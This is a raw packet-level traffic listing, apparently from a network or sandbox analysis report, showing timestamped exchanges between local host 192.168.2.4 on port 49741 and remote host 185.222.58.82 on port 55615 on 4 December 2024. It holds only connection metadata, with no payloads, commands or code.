Dec 4, 2024 13:17:27.566375017 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.566379070 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.566390991 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.566436052 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.566487074 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.566495895 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.566548109 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.566565990 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.566637993 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.566649914 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.566683054 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.566692114 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.566735029 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.566781998 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.566791058 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.566838026 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.566873074 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.566881895 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.566936016 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.566975117 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.566992044 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.567045927 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.567120075 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.567130089 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.567176104 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.567236900 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.567248106 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.567266941 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.567280054 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.567308903 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.567337990 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.567343950 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.567353964 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.567392111 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.567435026 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.567445040 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.567480087 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.567507982 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.567588091 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.567634106 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.567640066 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.567667007 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.567770958 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.567780972 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.567792892 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.567795038 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.567821980 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.567826033 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.567835093 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.567876101 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.567897081 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.567907095 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.567938089 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.567950010 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.567986965 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.568032026 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.568042040 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.568113089 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.568120956 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.568123102 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.568165064 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.568169117 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.568217993 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.568227053 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.568254948 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.568273067 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.568430901 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.568440914 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.568478107 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.568496943 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.568506956 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.568546057 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.568619967 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.568629980 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.568675041 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.568713903 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.568768024 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.568774939 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.568856001 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.568944931 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.568954945 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.568994999 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.569010973 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.569015026 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.569046021 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.569053888 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.569056034 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.569113016 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.569154978 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.569165945 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.569195986 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.569216013 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.569253922 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.569319010 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.569334984 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.569390059 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.569438934 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.569528103 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.569538116 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.569590092 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.569624901 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.569634914 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.569643021 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.569674969 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.569693089 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.569796085 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.569808006 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.569816113 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.569824934 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.569858074 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.569885969 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.569897890 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.569905996 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.569915056 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.569943905 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.569957018 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.569967985 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.569977999 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.570019007 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.605475903 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.605489016 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.605541945 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.605560064 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.605604887 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.605650902 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.605695963 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.684617043 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.684640884 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.684659958 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.684699059 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.684700966 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.684715033 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.684752941 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.684796095 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.684809923 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.684815884 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.684863091 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.684878111 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.684923887 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.684926987 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.684962034 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.684976101 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.684978962 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.685009003 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.685029984 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.685034990 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.685059071 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.685081959 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.685091972 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.685101986 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.685153008 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.685199022 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.685205936 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.685220003 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.685275078 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.685303926 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.685316086 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.685338974 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.685357094 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.685358047 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.685379982 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.685396910 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.685451984 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.685465097 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.685497999 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.685512066 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.685517073 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.685551882 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.685583115 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.685638905 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.685681105 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.685724974 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.685729027 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.685770988 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.685827971 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.685841084 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.685894012 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.685899973 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.685931921 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.685955048 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.685971022 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.686012030 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.686057091 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.686069012 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.686115026 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.686131001 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.686166048 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.686218977 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.686281919 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.686295033 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.686337948 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.686393976 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.686444998 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.686517000 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.686530113 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.686543941 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.686585903 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.686638117 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.686662912 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.686712027 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.686845064 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.686857939 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.686899900 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.686959028 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.687005043 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.687015057 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.687057972 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.687143087 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.687159061 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.687191963 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.687217951 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.687304020 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.687340021 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.687361956 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.687387943 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.687463045 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.687525034 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.687551975 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.687593937 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.687594891 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.687640905 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.687673092 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.687721968 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.687818050 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.687980890 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.687994003 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.688005924 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.688033104 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.688038111 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.688045979 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.688054085 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.688076973 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.688103914 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.688146114 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.688159943 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.688210011 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.688280106 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.688292980 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.688328028 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.688338995 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.688342094 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.688390970 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.688477039 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.688491106 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.688529968 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.688533068 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.688633919 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.688847065 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.688941956 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.689016104 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.689083099 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.689330101 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.689480066 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.689814091 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.689903021 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.690138102 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.690207005 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.690946102 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691117048 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.691170931 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691184044 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691196918 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691209078 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691220999 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691225052 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.691232920 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691241980 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.691261053 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691271067 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.691273928 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691286087 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.691291094 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691308022 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691329002 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691338062 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.691339970 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691354036 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.691354990 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691368103 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691380024 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691389084 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.691392899 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691406012 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691417933 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691430092 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691442013 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691452980 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691463947 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691474915 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691487074 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691498041 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691509962 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691521883 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691533089 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691545010 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691555977 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691570997 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691601992 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691613913 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691625118 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691637039 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691653967 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691665888 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691683054 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691694021 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691704988 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691716909 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691728115 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691740036 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691751003 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691764116 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691775084 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691786051 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691797972 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691808939 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691833973 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691845894 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691859007 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.691869020 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.692533970 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.692547083 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.692703962 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.692719936 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.692856073 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.692868948 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.692882061 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.693008900 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.693022013 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.693176985 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.693188906 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.693331003 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.693344116 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.693475962 CET	55615	49741	185.222.58.82	192.168.2.4
